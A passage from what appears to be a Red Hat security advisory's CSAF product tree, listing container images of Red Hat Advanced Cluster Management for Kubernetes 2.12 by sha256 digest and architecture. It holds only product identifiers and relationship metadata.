"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
